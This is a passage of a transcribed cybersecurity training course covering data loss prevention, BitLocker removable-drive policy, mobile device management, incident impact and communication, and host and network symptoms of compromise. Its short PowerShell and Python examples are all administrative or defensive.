are familiar with the fact that yes, laptops and tablets are computers. A lot of people don't seem to consider
smartphones to be full-fledged computers, although really they are. So, as such, they need things like personal
firewalls installed, antivirus solutions installed, and so on. There are many infections for smartphones, so
user awareness is key here.
Other DLP risks include removable media such as USB flash drives. So, for instance, we might have a user
that copies sensitive data to a USB thumb drive and then takes that thumb drive elsewhere. And this has
been known to happen in many different cases even with sensitive military information. Risk origin usually
ends up going back to humans. It's usually us that cause these security breaches and it results in data loss.
Now think about examples that we've seen in the media even over the last few years, such as the Target security
breach where 110 million customer records were stolen. Now everybody needs to be involved with IT security
to prevent that type of thing from happening, especially at that scale. And, when we say everybody, we mean
end users, management, the board of directors. Everybody needs to be involved with IT security and awareness
is key.
Data loss prevention can be applied to data in use. That would be data being processed, for example, within an
application. Data loss prevention can also apply to data in transit such as encrypting data or limiting where data
can be sent or received over a network. For example, sensitive files might be able to be attached to e-mail
messages but the recipients might have to reside within the organization.
Then there's data at rest where we store data and it must be protected. Normally, this comes in the form of
making sure the data is encrypted when it's stored and also auditing access to that data. To implement data loss
prevention, the first thing we do is identify the data that needs to be protected. We then identify threats against
the data and then apply our DLP solution. As with all security controls, we need to monitor our DLP solution
as an ongoing task for effectiveness.
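As a conceptual illustration of the identify-and-apply steps just described, here's a minimal sketch of a DLP-style check in Python that scans outbound text for 16-digit sequences and uses the Luhn checksum to flag likely payment card numbers; it's illustrative only, far simpler than a commercial DLP engine, and the sample message is made up.

import re

def luhn_valid(number):
    # Standard Luhn checksum used to validate payment card numbers
    digits = [int(d) for d in number][::-1]
    total = 0
    for i, d in enumerate(digits):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def contains_card_number(text):
    # Flag any 16-digit run that passes the Luhn check
    return any(luhn_valid(match) for match in re.findall(r"\b\d{16}\b", text))

outgoing = "Please charge 4111111111111111 for the invoice"  # made-up message using a well-known test card number
if contains_card_number(outgoing):
    print("Blocked: message appears to contain a payment card number")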
Now examples of this include things like Microsoft's Group Policy settings where we can control removable
media. Here, in the Local Group Policy Editor [The Local Group Policy Editor window is open. Running
along the top of the window is a menu bar. The window is divided into two sections. The first section is the
navigation pane which contains Local Computer Policy node which further contains two subnodes, Computer
Configuration and User Configuration. The Computer Configuration subnode contains three folders named
Software Settings, Windows Settings, and Administrative Templates. The User Configuration subnode contains
three folders named Software Settings, Windows Settings, and Administrative Templates. The second section is
the content pane which displays the information regarding Local Computer Policy. It contains Name tab
which has two options named Computer Configuration and User Configuration.] whether we're editing local
group policy which we are here or in Active Directory, we can control access to data being written to or read
from USB devices. For example, under Computer Configuration in the left hand navigator, I'm going to
expand Administrative Templates. And, under there, [He clicks the Administrative Templates which includes
various subfolders such as Control Panel, Network, and Windows Components. The Windows Components
subfolder further includes various subfolders such as BitLocker Drive Encryption and Desktop Window
Manager.] I'm then going to open up Windows Components and I'm going to look at BitLocker Drive
Encryption.
Now, in the Windows world, BitLocker allows us to encrypt entire disk volumes. So, when I expand
BitLocker Drive Encryption, I can see Fixed Data Drives, Operating System Drives, and what we're looking
for – Removable Data Drives. Now, when I select Removable Data Drives on the left, on the right I get a
handful of settings. [He refers to the content pane which includes information related to the Removable Data
Drives. A table is displayed with column headers titled Setting, State, and Comment. The table includes
various rows under Setting such as Control use of BitLocker on removable drives and Deny write access to
removable drives not protected by BitLocker. He clicks the Deny write access to removable drives not
protected by BitLocker whose State is Not configured and Comment is No. The Deny write access to
removable drives not protected by BitLocker dialog box opens. The window contains two buttons named
Previous Setting and Next Setting adjacent to the Deny write access to removable drives not protected by
BitLocker message. Under that there are three radio buttons named Not Configured, Enabled, and Disabled.
The Not Configured radio button is selected by default. The page further contains two sections titled Options
and Help.] For example, one of them is to deny write access to removable devices that aren't protected by
BitLocker encryption.
So, to prevent data loss or disclosure of sensitive information outside of the organization, we might require
encryption to be used on removable thumb drives before data can be written to them.
Mobile devices are very convenient and can make people productive, but at the same time they introduce new
challenges and risks for IT security specialists. There are challenges with the BYOD – Bring Your
Own Device – environment, where users can bring personal mobile devices to be used for work purposes. Now, when this is
done, the organization should be using some kind of centralized mobile device management or MDM solution
where, for instance, a VPN connection would be triggered on your smartphone when a certain app that requires
access is started.
Also strong device authentication requirements should be put in place such as PKI certificate authentication or
multifactor authentication. The device should be encrypted. We also should have remote wipe capabilities. So,
if the device is lost or stolen, we can either wipe just the company data from it or basically do a factory reset
on the device to prevent sensitive data loss.
We can also control app installations on mobile devices using our centralized MDM tool so that users don't
install apps that might be malicious. We can also do things like disable Bluetooth, disable the camera, and
many other options. Device partitioning or containerization is very important with mobile devices. It allows us
to perform a selective wipe. So we might, for instance, have a corporate partition on a mobile device where
we've got corporate apps, settings, and data. And then there's a personal partition with personal apps, settings,
and data.
So, if the smartphone – for instance – is lost, we could perform a selective wipe against the corporate partition
only. Solutions can also prevent data from being forwarded. In the case of things like e-mail or in the case of
printing, copying and pasting or even storing data in alternate locations maybe in the corporate partition on a
smartphone, corporate sensitive data might not be allowed to be stored in other locations such as a user's
personal Dropbox account.
[Topic title: Prevent Data Storage on Unencrypted Media. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to prevent data storage on unencrypted media. Here, on my Windows server, I'll begin by
going to the Start button in the bottom left and I'll type in "group". [He types group in the Search bar.]
Now I'm going to start the Group Policy Management editor so that we can turn on some BitLocker Drive
Encryption options as per our needs. [The Group Policy Management window opens. Running along the top of
the page is the menu bar which contains menu options such as File, Action, View, Window, and Help. The
window is divided into two sections. The first section is the navigation pane which contains Group Policy
Management node which contains Forest quick24x7.com and Sites nodes. The Forest quick24x7.com node
contains Domains subnode which further contains quick24x7.com subnode. The quick24x7.com subnode
includes various folders such as Default Domain Policy, Boston, and Group Policy Objects. The Default
Domain Policy is selected by default. The second section is the content pane which displays information of the
option selected in the first section. The content pane contains four tabs named Scope, Details, Settings, and
Delegation. The Scope tab is selected by default.] So, in the left hand navigator where I see a list of my GPOs
or Group Policy objects, I'm going to right-click on the Default Domain Policy. This GPO will apply to all
users and devices within the domain. So I'm going to right-click on the GPO [He right-clicks the Default
Domain Policy folder. As a result, a shortcut menu appears which includes various options named Edit,
Enforced, and View.] and choose Edit. That opens up the Group Policy Management Editor screen.
Now BitLocker options are tied to the computer. They're not tied to the user like encrypting file system or EFS
is. So therefore, on the left, that tells me I'm not going to go down under User Configuration but instead under
Computer Configuration. So that's correct. I'm going to expand the Policies under Computer Configuration,
under which I'll then open up Administrative Templates - Windows Components. And now we see on the left
BitLocker Drive Encryption.
Now, when we select BitLocker Drive Encryption, we see a number of settings over here on the right such as
to store BitLocker recovery information in Active Directory and so on. But we've also got three folders of
BitLocker settings, one for Fixed Data Drives in a machine, another category for Operating System Drives in a
machine, and finally what we're looking for – Removable Data Drives. Let's open that up by double-clicking.
The first thing I want to do is go into the option here that we need. It's called...I'll just double-click on it –
Deny write access to removable drives not protected by BitLocker. So what I want to do is make sure that that
option is Enabled. [He selects the Enabled radio button.] Once the option is Enabled and we save our
configuration, [At the bottom of the Deny write access to removable drives not protected by BitLocker window
are three buttons named OK, Cancel, and Apply. He clicks the OK button.] which simply means clicking OK,
so we can now see here that the State column will have Enabled once that's been turned on. It's a matter of
Group Policy refreshing on other machines that are affected by this GPO before they put the setting into effect.
Now that can take anywhere from 90 minutes to many hours, maybe even days in some multisite
environments. So check your network documentation to see how long that should take. [The Command
Prompt window opens.] Now that's fine for configuring BitLocker settings. But how do we actually turn it on?
Well, on a single Windows machine from the command line, we could use the manage-bde command line
tool [He executes the following command line: manage-bde.] where BDE stands for BitLocker Drive
Encryption.
If I just type that in without any parameters, notice it pops up a help screen. [He refers to the output of the
command.] So, from the help screen, I can clearly see the parameters that will enable BitLocker Drive
Encryption, in this case, "-on" for a specific volume, or I could turn it off and so on. Now there's not an easy
way to do this built directly into Group Policy. What we could do is create a script that uses the manage-bde
command line tool and that script could be delivered and run through Group Policy for machines.
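As a rough sketch of what such a script could look like – here driven from Python rather than a batch file, with a placeholder drive letter, and run as an administrator on a Windows machine – it simply checks BitLocker status and then turns it on for a volume using the same manage-bde tool shown above.

import subprocess

DRIVE = "E:"  # placeholder drive letter for a removable volume

# Query the current BitLocker status for the volume
subprocess.run(["manage-bde", "-status", DRIVE], check=True)

# Enable BitLocker Drive Encryption on the volume, using the "-on" parameter shown in the help screen above
subprocess.run(["manage-bde", "-on", DRIVE], check=True)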
In this video, you will learn how to determine the effect of negative incidents.
Objectives
[Topic title: Scope of Impact. The presenter is Dan Lachance.] Today's organizations face many potential
threats against their IT systems and data. In this video, we will talk about the scope of impact.
The first thing to do is to look at assets that have value to the organization. Secondly, we then identify threats
related to those assets, which allows us to then prioritize those threats so that we know where to focus
resources and energy. We then need to determine the business impact or the scope. So, if a threat materializes
against an asset, does it affect one user, an internal user, or millions of customers? Is it affecting one computer, an entire network, or an entire IT ecosystem? We have to think very carefully about what is
being impacted when negative incidents occur.
Downtime always has a financial impact because time is money. Whether it's an e-commerce web site that's down for a few hours and thus can't sell things to customers on the Internet, or some kind of a payment system that's unavailable so customers can't buy something, it ends up being very irritating to customers. And part of what we want to do to retain customers is not irritate them.
Recovery time is related to incident response. This has to be done proactively, has to be planned in terms of an
incident response policy so that when these things occur, the appropriate technicians know their roles and
know what to do to get systems or data up and running as quickly as possible. Now, in terms of individual
components like for servers and network equipment, we should consider the MTTR – the mean time to
recovery. We should also think about the RTO – recovery time objective – in general when negative incidents
occur.
The recovery time objective really stipulates the maximum tolerable amount of downtime, let's say, for an e-
commerce web site before it has a serious negative impact on the organization. The SLA or service-level
agreement is a contractual document between a service provider and a service consumer and it can be
negotiated. Often it references details such as downtime that is to be expected if it relates to IT services. So
let's talk about this in the context of an organization purchasing public cloud provider services.
So the public cloud provider SLA to the consumer will have guaranteed uptime. So ideally we'll have very
minimal downtime. There are also items related to response time – not just for IT systems, to make sure they're responsive over the Internet to the cloud, but also response time for technical support, so we know when to expect support from the provider. Then, of course, the SLA has a section that deals with consequences. Now the
SLA isn't just about everything being on the back of the provider. Consequences normally turn out to be
credits to the consumer, for example, for the next month's usage of cloud services.
Pictured here, I've gone into my web browser and popped up the SLA for Microsoft Azure cloud computing
specifically for virtual machines. [The SLA for Virtual Machine web page is open. Running along the top of
the Microsoft Azure web page there are various tabs named Why Azure, Resources, and Support. The Support
tab is selected by default. The rest of the page contains information related to SLA for Virtual Machines.] So
we can see here that it talks about 99.95% uptime. And, as I go through this, [The page includes various
expandable sections such as introduction, General Terms, and SLA details.] I see the sections within the
document. So I can see a definition of terms, downtime, service credits [The SLA details section is expanded
which includes various information such as Additional Definitions, Downtime, and Service Credit.] that would
be applied if Microsoft doesn't live up to their stipulations inside the SLA, and so on.
So there are various types of SLAs. You might even have one within your organization if you're large enough because departmental chargeback might be used for IT services. When bad things happen to IT systems or
data, we have to think about the economic impact. The SLE is the Single Loss Expectancy. This is a value that
is derived by taking a look at historical data as well as current data and determining what type of numeric
value, monetary value will be associated with some kind of a negative incident.
The ARO is the Annual Rate of Occurrence that we could expect for a negative incident. Therefore, the ALE is the Annual Loss Expectancy from negative incidents occurring. The ALE is derived by taking the Single Loss Expectancy and multiplying it by the Annual Rate of Occurrence. This is used to determine whether the security controls that we have in place provide a cost benefit. We don't want to pay more for a security control than the asset it protects is worth, or more than the likely cost of a failure and its recovery. In short, the cost of a control should make sense relative to the value of the asset and the likelihood of loss.
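For example – using made-up figures purely for illustration – if a single incident is expected to cost $8,000 (the SLE) and we expect it to occur twice a year (the ARO), the ALE works out to $16,000 per year, so spending much more than that annually on a control for that one risk would be hard to justify. A quick sketch of the math:

```powershell
# Illustrative only: hypothetical figures for a single asset
$SLE = 8000        # Single Loss Expectancy in dollars
$ARO = 2           # expected occurrences per year
$ALE = $SLE * $ARO # Annual Loss Expectancy = SLE x ARO

"ALE is {0:C0} per year" -f $ALE   # ALE is $16,000 per year
```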
The other thing to consider in terms of the impact of negative events is data integrity. If we've got a security
breach, then data trustworthiness might go out the window depending on what we've got in place. So we might
have audit trails to track activities so that we can trust and rest assured that data has not been tampered with or
disclosed to unauthorized parties. Then there are hashes and signatures.
So, for example, we might compute a hash of a file, which results in a unique value. When we compute that hash again in the future and it's different from the original hash, we know something has changed in the file. At the e-mail level, we might look at digital signatures: a PKI certificate contains a private and public key pair, and the private key is used to generate a unique digital signature, for instance, on a mail message. The recipient verifies the authenticity of that signature by using the related public key.
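As a minimal sketch of the file-hash idea – the file paths are placeholders – PowerShell's Get-FileHash can record a hash now and compare it later:

```powershell
# Record a baseline hash of a file we care about (paths are hypothetical)
$baseline = (Get-FileHash -Path "C:\Data\contracts.xlsx" -Algorithm SHA256).Hash
$baseline | Set-Content "C:\Baselines\contracts.sha256"

# Later: recompute and compare; a mismatch means the file changed
$current = (Get-FileHash -Path "C:\Data\contracts.xlsx" -Algorithm SHA256).Hash
if ($current -ne (Get-Content "C:\Baselines\contracts.sha256")) {
    Write-Warning "File hash differs from the baseline - the file has changed."
}
```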
Finally, on critical system processes, we should have failover mechanisms in place. This could be as simple as
using a failover cluster where you've got at least two servers offering the same, let's say, line of business
application. If one server fails, the other one picks up and users are redirected to the running server. Of course,
for that to work effectively, all servers within the cluster should be using the same shared storage so they have
the same up-to-date data. But, in some cases, you might use data replication across different regions or even to
an alternate site. A hot site is another site that we can use for business operations if the primary site fails for
some reason.
But the reason it's called a hot site is because it's ready to go at a moment's notice. So we've got a facility. It's
got equipment, software. It's even got up-to-date data. We don't rely on data backups with a hot site. Now the
way that we have the up-to-date data is by having replication that occurs constantly from the primary site to
this alternate hot site. Ideally, it would be synchronous replication, which means when data is written in the
primary site, at the exact same time it's also written to the alternate site. If there's a bit of a delay with the
replication, then we would call it asynchronous replication.
In this video, find out how to identify stakeholders related to incident response.
Objectives
[Topic title: Stakeholders. The presenter is Dan Lachance.] In this video, I'll discuss stakeholders.
Stakeholders have a vested interest in asset protection. And they should be involved in all project phases. Now
an IT project should include security in all phases from its inception all the way out to the deployment of a
solution, the ongoing maintenance, and the inevitable decommissioning. Security can't be an afterthought. It's
got to be always a part of every phase of a project. Now stakeholders have an interest then in our IT assets
whether they be specific IT business processes or whether they are related to IT systems or data.
Stakeholders should also be involved in security policy creation. Organizational security policies dictate what
is acceptable and what is not and essentially how systems and data are protected. Now security policies don't
just get created and then they're good to go and never get changed or revisited. So making changes and
reviewing security policies is an ongoing task that never ends. One of the reasons for this is that technology is changing constantly – and, as it relates to a specific business, there will be different ways of using technology to support business objectives. As a result, new threats could materialize that were not there before. Think of when mobile phones and smartphones began to be used in business environments. That introduced a whole new set of potential attacks that were not there before, because we have another computing device that a lot of people just aren't treating as a computing device.
They're not thinking about the fact that it could be infected with malware as easily as a Windows computer
could be. Stakeholders also need to be involved with communication regarding security incidents that occur. In
some cases, this might be mandated by law. So, when there's a security breach, affected stakeholders must be
notified.
The first part of working with stakeholders is identifying who they are and what interests they have in our IT
systems and data. This would include internal stakeholders like human resources staff, legal, marketing,
management, and then – of course – externally customers. There needs to be a formal change management
process within organizations. And, if we look at frameworks like ITIL, they stipulate this very clearly. So all
changes that need to be made need to be captured accordingly. And they need to go through the proper approval
process before they are made.
Now any changes that are made need to be documented. And this needs to be made available to stakeholders.
There also needs to be regular meetings that are held especially after incidents. But really this should be an
ongoing task all of the time. With regular meetings, some or all stakeholders might be involved at the same
time or at different times – so different meetings or one big meeting. And, in these meetings, lessons learned
from incidents can be reviewed to improve business processes and security related to them.
Upon completion of this video, you will be able to recognize incident response roles.
Objectives
[Topic title: Role-based Responsibilities. The presenter is Dan Lachance.] In this video, I'll talk about role-
based responsibilities.
The principle of least privilege stipulates that only required permissions to perform a specific business related
task should be granted and no more. This also means that data needs to be provided on a need-to-know basis
only. Separate user accounts allow for role-based responsibilities. It allows for auditing. So we can track which
users performed which actions against systems or files on certain dates and times. If everyone is logging in
using the same user account, this can't be done.
This is especially important with administrative accounts where all too often the same Windows Administrator
account or Linux root account keeps getting used by different administrators. This is not recommended. Role-
based responsibilities fall under many different categories including technical. With technical role-based
responsibilities, there should be separate administrative accounts as we've mentioned such as the Windows
Administrator account and the Linux root account not being shared by multiple admins.
Administrative delegation allows other administrators to take control of some aspect of an IT system. An
example would be in Active Directory, where we could delegate security permissions to another administrator to manage a different organizational unit so that they could work with user accounts and groups and so on in Active Directory only within a certain area. So, as an example here in Active Directory Users and
Computers, [The Active Directory Users and Computers window is open. Running along the top of the page is
a menu bar which contains File, Action, View, and Help menu options. The window is divided into two
sections. The first section is the navigation pane which contains a node named Active Directory Users and
Computers, a folder named Saved Queries, and a subnode named fakedomain.local. The
fakedomain.local subnode includes various folders such as Domain Controllers, ProjectManagers, and Users.
The Users folder is selected by default. The second section is the content pane which displays user groups in a
tabular format. The column headers are Name, Type, and Description. The rows under Name include
Administrator, Guest, and HelpDesk.] I've got a group called HelpDesk. And I want to make sure that they are
delegated permission to the ProjectManagers OU.
So I'm going to right-click on the ProjectManagers OU and choose Delegate Control [As a result, Delegation
of Control Wizard opens. At the bottom of the wizard there are four buttons named Back, Next, Cancel, and
Help. He clicks the Next button.] and click Next. And, for Selected users and groups, [He refers to the
Selected users and groups text box which contains Add and Remove buttons at the bottom of the text box. He
clicks the Add button.] here I'm just going to type in help. [The Select Users, Computers, or Groups dialog
box opens. The dialog box contains two fields and one text box. In the Select this object type field, Users,
Groups, or Built-in security principals is selected by default and adjacent to that is an Object Types button. In
the From this location field, fakedomain.local is selected by default and adjacent to that is a Locations button.
In the Enter the object names to select (examples) text box, he types help and adjacent to that there is a Check
Names button. At the bottom of the dialog box are three buttons named Advanced, OK, and Cancel.] And let it
find the helpdesk group [He types help in the text box and clicks the Check Names button which finds the
HelpDesk group. And he clicks the OK button.] and I'll OK that and continue on by clicking Next. [The
HelpDesk (FAKEDOMAIN\HelpDesk) is added in the Selected users and groups text box. He clicks the Next
button.] And maybe what I want the helpdesk to be able to do for, [The Delegation of Control Wizard
contains two radio buttons. The first radio button is named Delegate the following common tasks. The second
radio button is named Create a custom task to delegate. The first radio button includes various check boxes
such as Reset user passwords and force password change at next logon and Modify the membership of a
group.] let's say, users that are project managers is reset user passwords and maybe Modify the membership of
a group. And I'll just proceed through the wizard. [He selects the Reset user passwords and force password
change at next logon and Modify the membership of a group checkboxes. And clicks the Next button and then
Finish button.] And now it's done.
So what we've just modified is an ACL – the access control list – in Active Directory for that organizational
unit so that the helpdesk members can modify user accounts in certain ways. But ACLs can apply to web
applications, databases, file servers, and so on. So, for role-based responsibilities, it's important that our IT solutions, such as applying an ACL to secure data, align with business goals because, in the end, the only reason IT is useful is that it solves business problems.
Now role-based responsibilities are also important for incident response and investigation because people need
to know what role they must play when an incident occurs. Now, of course, there needs to be an ongoing
evaluation of security control effectiveness to ensure it's still valid and doing what it's supposed to do such
as permissions to the file system or to organizational units in Active Directory.
At the management level, there are things like security policies that dictate how things are to be done and what
is acceptable and what is not. Step-by-step procedures, for instance, might be outlined in a disaster recovery
plan for a specific server. So, as long as people know their roles in disaster recovery in case of a malware
infection or some kind of a malicious attack, they'll know the step-by-step procedures to get that system up and
running as quickly as possible and as efficiently as possible.
At the management level, there is also the ongoing task of business process improvement. There's always a way to improve business processes – and specifically, in our case, the IT systems that support them – while making sure they're secure. Management role-based responsibilities, of course, are also related to personnel, for hiring and firing and so on. At the law enforcement level, in different jurisdictions there are different rules that
would apply and are enforceable such as with cloud storage, which may or may not be allowed for certain
types of businesses in certain countries and depending upon the nature or classification of the data that's being
stored.
There's also evidence gathering for forensics – especially digital forensic investigations – where the chain of custody must be maintained so that evidence is tracked at all times and we know who had access to it and where it was. And, of course, there are certain applicable laws for technology solutions that
differ in different areas such as whether or not it's okay to use somebody else's open Wi-Fi.
Incident response providers also play a role. And it's also a service that you can pay for from a third party. So
we can outsource it with a service-level agreement that dictates exactly what the responsibilities of the incident
response provider are. And, in some cases if we don't have the in-house expertise, then it might actually
improve incident response time by having an external provider handle it. They might also be able to do remote
investigations over the Internet instead of having to physically be on-site.
In some cases, if required they might come on-site and they will know what digital forensics techniques to use
as well as which tools to use. And we'll be looking at some of those in some other demos.
Upon completion of this video, you will be able to describe the options for disclosing an incident.
Objectives
describe incident disclosure options
[Topic title: Incident Communication. The presenter is Dan Lachance.] Bad things unfortunately happen to organizations; the issue is how they're communicated and handled. In this video, we'll talk about incident
communication.
In some cases, communication to affected parties may be required whether those parties are the public or
affected individuals specifically or even just affected business entities. Sometimes there is limited disclosure of
exactly what happened with a negative incident that we must reveal to relevant stakeholders. Part of this is data loss prevention or DLP, where we want to make sure that we prevent the unintentional release of incident information beyond what is required and what we ethically should be releasing.
There are sometimes legal and regulatory requirements that determine exactly what must be disclosed, how, and who should be notified. For instance, with personally identifiable information or PII as related to U.S. HIPAA, a security breach involving more than 500 individuals must be reported. Similar requirements exist around the world under different legislation, such as Canada's Digital Privacy Act.
So, for example, a customer notification requirement might be something we have to comply with for credit card data
security breaches. We have to consider secure incident communication methods in the first place. We might
also be using a third-party incident response provider. So we want to have secure communication with them
after a negative incident occurs.
On the public relations or PR side, it's crucial that we have a team that relates the information that needs to be
delivered to the appropriate stakeholders properly. So as we know, it's not always what the message is but
rather how it's being delivered that has the biggest impact. So we have to think about that from the public
relations side. If there's poor communication, it could result in reputational damage or irate customers for the company or agency – both of which are bad for business.
In this video, find out how to analyze host symptoms to determine the best response.
Objectives
[Topic title: Host Symptoms and Response Actions. The presenter is Dan Lachance.] In this video, I'll discuss
host symptoms and response actions.
Before we can determine what behavior is abnormal or suspicious, we've got to know what's normal. At the
host level, it's important to establish a normal usage baseline, which we compare current activity against to
detect anomalies.
Performance degradation especially over an extended period of time is an easy indication that we've got some
kind of a problem, which could even be related to, for instance, compromise or some kind of malware
infection. Unexpected configuration changes can also indicate that we've got some kind of a problem, maybe
we're infected. For example, if the next time you start your web browser the home page has been changed to something you know you did not set, and you cannot revert it, you've got some kind of an infection – maybe some kind of spyware or adware that's made the change for you. Either way, it's not good.
The same goes for unexpected apps that get installed in the background. Now, in some cases, when users
install free software, they just click through the wizard. They click next, next, next without really reading. And
sometimes there are additional pieces of software that get installed. Other times, unbeknownst to the user and without their consent, a script or a program can run in the background, and it could result in something being installed that we didn't want. Now, in some cases, it can be very difficult to remove that installed app. On a Windows client station, you could revert to a system restore point – an earlier point in time prior to the app being installed – but it's not always quite that basic, especially on the server side or with Linux.
With excessive processor consumption, the system will slow down. Users will probably open a helpdesk ticket quite quickly if this continues. Now sometimes the culprit could be as simple as a web browser plugin that we didn't install, but rather was installed automatically in the background. Web browser plugins give additional
functionality for reading PDFs and so on. But you may want to check your web browser plugins or even
prevent additional plugins from installing automatically to speed up your web browsing experience.
Now that's specific to a web browser but it is important. Of course, if we've got some kind of a malware
infection, that might show up as processor utilization spiking and maybe even staying spiked for periods of
time. Now what we should do is take a look at our running processes and try to isolate what is causing the
processor utilization.
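For example – just a quick illustration, not a full investigation procedure – you could list the processes that have accumulated the most CPU time with PowerShell:

```powershell
# Show the ten processes that have accumulated the most CPU time since they started
Get-Process |
    Sort-Object -Property CPU -Descending |
    Select-Object -First 10 -Property Name, Id, CPU, WorkingSet |
    Format-Table -AutoSize
```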
Also, sometimes an infected host might be used to send spam e-mail. And that's why outgoing firewall rules on every host should probably carefully look at SMTP traffic leaving the host to verify whether it's legitimate
or not. And that's one of the reasons why it's important that every device including smartphones have a
personal firewall installed and configured appropriately. And those things can be configured centrally. It's not
like we have to go to every device and configure the firewall, that's not the case.
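As one hedged example of such an outbound rule on a Windows host – the rule name is only an example, and you would obviously exempt legitimate mail servers – outbound SMTP could be blocked like this:

```powershell
# Minimal sketch: block outbound SMTP (TCP 25) on a workstation that has no
# business sending mail directly; the display name is just an illustration.
New-NetFirewallRule -DisplayName "Block outbound SMTP" `
    -Direction Outbound `
    -Protocol TCP `
    -RemotePort 25 `
    -Action Block `
    -Profile Any
```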
Also an infected host might be used as a zombie for a distributed denial of service attack or a DDoS attack.
Now a zombie, as you might guess, is an infected machine that's under malicious user control. And a botnet or a
zombie net is a collection of these computers – could be in the dozens, hundreds, even thousands – that are
under control of a malicious user. And that user can issue some kind of command set to these zombies and
have them attack, you know, a victim network or a victim computer and so on.
This is another one of those commodities actually that gets traded – if you will – on the black market, on the
Internet along with credit card numbers and PayPal credentials and so on. Once malicious users have these
zombie nets under their control, they can actually sell it to others so that others can execute DDoS attacks
against victims maybe in return asking for ransom payment and so on – either way it's all bad stuff.
Memory consumption could also be an indication of, well, poor programming. It might require simply a reboot
of the system. But it also could be a problem with a network attack of some kind. So we might have a remote
buffer overflow attack where an attacker is sending more data than the programmer intended for a specific
variable in memory.
Now, when we overwrite beyond what is allocated in memory – for example – for a variable, the potential
exists for us to gain remote administrative privileges to that system or potentially to corrupt other data beyond
what was allocated, thus causing a service or the whole host to crash or malfunction somehow. So we should
be monitoring these things – memory, CPU utilization, network traffic, and so on.
Storage space consumption is another issue on a host. Now, storage could be consumed legitimately by temporary files. But from a malicious standpoint – and here we're talking as cybersecurity analysts, experts in security – the host could have been compromised in the past and is now being used by an attacker to store files.
So that could be another reason why we're running out of disk space. It's another one of those aspects of
computing that should be monitored periodically.
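A simple periodic check along those lines – the threshold here is an arbitrary example – might look like this in PowerShell:

```powershell
# Warn when any fixed disk drops below a chosen free-space threshold (illustrative value)
$thresholdPercent = 10

Get-CimInstance -ClassName Win32_LogicalDisk -Filter "DriveType=3" | ForEach-Object {
    $freePercent = ($_.FreeSpace / $_.Size) * 100
    if ($freePercent -lt $thresholdPercent) {
        Write-Warning ("Drive {0} is down to {1:N1}% free space" -f $_.DeviceID, $freePercent)
    }
}
```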
Storage space consumption ideally would send alerts to administrators when it gets beyond a threshold – same
thing with memory, CPU, and network utilization. Unauthorized software is software that was not installed by
the user. So usually the user didn't install it or if they did intentionally install it, they thought it was something
else. It might have looked benign. So it could have been like a trojan horse piece of software, but really it's
malware.
Now, in some cases depending on your systems, it's possible for software to be installed without user consent
in the background. In the Windows world, that's precisely what User Account Control or UAC is for. It will
prompt the user. Well, it depends on the configuration. But it can be configured to prompt the user to allow
things to run in the background. The idea is we don't want things installed without user consent. Now that
being said – User Account Control – UAC is not designed to replace your malware scanners. You still need
those in addition. This just complements them.
Unauthorized software might also be something the user wants, but not what the organization wants. This is bad news. We don't want users to have any ability to install unauthorized software that isn't approved by the company. That also goes for apps on smartphones, because what happens then is it increases the attack surface. We've got things that aren't necessary, and it just opens up the possibility for more vulnerabilities being exploited by the bad guys.
Malicious processes run in the background and usually are a result of some kind of malware infection and
certainly it can degrade system performance. They may also have a corresponding service. Or, in the case of
Linux, a daemon that runs in the background. So we should be monitoring our background services in
Windows or daemons in Linux. Every now and then what you might want to do is from the command line, get
a list of services and pipe it out to a file. Of course, you would automate this. And then periodically you would
compare the current list of running services with what you've piped out to a file.
In Windows, you might do this in PowerShell; in Linux, we might write a shell script to do it. We should always make sure that any processes that are running are allowed to be running and are legitimate. At the same time, we want to be careful that we don't kill any running processes that we think are nefarious when, in fact, they are required by the operating system.
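As a rough PowerShell sketch of that service-baseline idea – the file paths are only examples – you might export the list once and compare against it later:

```powershell
# One-time: capture a baseline of services and their start modes (example path)
Get-Service | Select-Object Name, Status, StartType |
    Export-Csv -Path "C:\Baselines\services-baseline.csv" -NoTypeInformation

# Later (for example, from a scheduled task): compare the current list to the baseline
$baseline = Import-Csv "C:\Baselines\services-baseline.csv"
$current  = Get-Service | Select-Object Name, Status, StartType

Compare-Object -ReferenceObject $baseline -DifferenceObject $current -Property Name |
    Where-Object SideIndicator -eq "=>" |
    ForEach-Object { Write-Warning "New service not in baseline: $($_.Name)" }
```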
When you enable auditing...and auditing comes in many forms. You can audit, for example, the failure of log
on attempts on a server or access to delete a file whether it succeeds or fails or users creating other user
accounts. All that can be audited. So we want to use auditing to detect unauthorized changes. So we want to
make sure that we don't bypass the change management control system in place in the company where we've
got a set structure, a formal procedure for making changes.
Data exfiltration really deals with data that leaks out of the organization and is thus made available to
unauthorized users. Often this is done without user consent. And again, it could be a result of malware, could
also be a user that intentionally copies sensitive data to removable media whether or not they intend to provide
it to unauthorized users. Again, there are things that we can do to prevent this from happening or to audit this
type of activity.
Find out how to analyze network symptoms to determine the best response.
Objectives
[Topic title: Network Symptoms and Response Actions. The presenter is Dan Lachance.] In this video, I'll talk
about network symptoms and response actions.
Before we can detect what's not normal on the network just like with a host, we have to know what is normal.
So, ahead of time, it's crucial that we establish a normal network usage baseline – against which we compare
current activity to detect anomalies.
Now all systems on the network or an individual host or a collection of hosts could be affected by some kind of
network compromise or malware infection. So therefore, network traffic monitoring tools need to be in place.
And they come in many different forms. For example, an intrusion detection system or IDS is either an appliance – it could be a virtual machine or a hardware appliance – or software that we install that detects anomalies and logs them or notifies administrators, but it doesn't do anything to stop them, whereas an intrusion prevention system does take steps to prevent suspicious activity from continuing.
Now naturally, IDSs and IPSs need to be configured or "trained over time" to determine what is suspicious.
Now a packet sniffer such as the free Wireshark tool or even the Linux and UNIX TCP dump command can be
used to capture network traffic. So we can see what's going on whether it's a wired network or wireless to see if
there are any abnormalities. Of course, there are ways to automate that so we don't have to do it and look for anomalies manually.
One great symptom of a problem on a network is bandwidth consumption. Now this might be happening for
good reasons. There might be numerous streaming applications running that should be running or people might
be listening to Internet music or news at work when they should not be. Also large downloads...if an IT
administrator is downloading a DVD ISO image or Windows updates, that kind of stuff can take a lot of
bandwidth. Now, depending on your equipment and your network environment, you might be able to throttle and
control what type of bandwidth is available for certain applications including downloading Windows updates
and streaming apps.
An infected host on the network could also be used for sending unsolicited spam e-mail to many e-mail
addresses elsewhere, or there could be abnormal peer-to-peer communications over the network. This might also
be indicative of a worm type of malware that self-propagates over the network between vulnerable hosts. So
